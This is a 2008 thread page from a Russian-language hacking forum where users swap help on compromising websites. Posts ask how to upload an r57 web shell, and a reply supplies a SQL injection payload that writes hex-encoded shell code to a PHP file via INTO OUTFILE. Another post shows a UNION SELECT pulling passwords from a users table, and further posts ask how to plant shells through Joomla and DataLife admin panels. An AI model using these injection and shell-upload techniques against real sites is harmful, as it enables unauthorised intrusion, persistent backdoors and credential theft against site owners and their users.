ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #2001  
Старый 18.05.2008, 19:25
brasco2k
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706

Репутация: 310
По умолчанию

как загрузить r57 через mysql inj


index.php?p=-1+union+select+1,password,3,4,5,6,7,8+from+users/*

это типа пароль узнать, а как шелл загрузить?
 

  #2002  
Старый 18.05.2008, 19:31
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

index.php?p=-1+UNION+SELECT+null, тут код шелла в bin2hex ,null,null,null,null+from+accounts+into+outfile+'/tmp/aaa.php'/*

так, если конечно инто_аутфаил разрешён...
 

  #2003  
Старый 18.05.2008, 19:33
brasco2k
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706

Репутация: 310
По умолчанию

Цитата:
Сообщение от Ch3ck  
index.php?p=-1+UNION+SELECT+null, тут код шелла в bin2hex ,null,null,null,null+from+accounts+into+outfile+'/tmp/aaa.php'/*

так, если конечно инто_аутфаил разрешён...
Забыл сказать сервер виндовый
 

  #2004  
Старый 18.05.2008, 19:35
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Какая разница...
https://forum.antichat.ru/threadnav34338-1-10.html
 

  #2005  
Старый 19.05.2008, 11:19
XaCeRoC
Познающий
Регистрация: 18.02.2008
Сообщений: 72
Провел на форуме:
340286

Репутация: 83
Отправить сообщение для XaCeRoC с помощью ICQ
По умолчанию

Скажите как залить шелл через админку в Joomla(Версия 1.0.1.2)?!
за ранее спс
 

  #2006  
Старый 19.05.2008, 11:39
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

XaCeRoC
_http://forum.antichat.ru/thread50600.html
 

  #2007  
Старый 20.05.2008, 19:13
ty13r
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме:
72605

Репутация: 13
Отправить сообщение для ty13r с помощью ICQ
По умолчанию

Подскажите плиз как залить шелл в админке Datalife версия 6.7
 

  #2008  
Старый 21.05.2008, 14:14
ty13r
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме:
72605

Репутация: 13
Отправить сообщение для ty13r с помощью ICQ
По умолчанию

Через че вообще пытаться залить? Через рисунки не получается.

Последний раз редактировалось ty13r; 21.05.2008 в 18:10..
 

  #2009  
Старый 21.05.2008, 18:30
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Цитата:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''46151'' LIMIT 1' at line 2
Правильно ли я понимаю, что здесь иньекция используется после LIMIT и сделать ничего нельзя?
 

  #2010  
Старый 22.05.2008, 18:59
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Задался вопросом научиться искать уязвимости в исходниках. Есть ли среди вас сансеи ))
Большая прозьба: не посылать учить языки программирования. На мой взгляд это не обязательно, достаточно уметь читать код(могу ошибаться ) Может кто подскажет или даст на расмотрение несколько наверняка уязвимых скриптов с комментариями?или ссылки на статьи по теме. Ну или... вам виднее.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ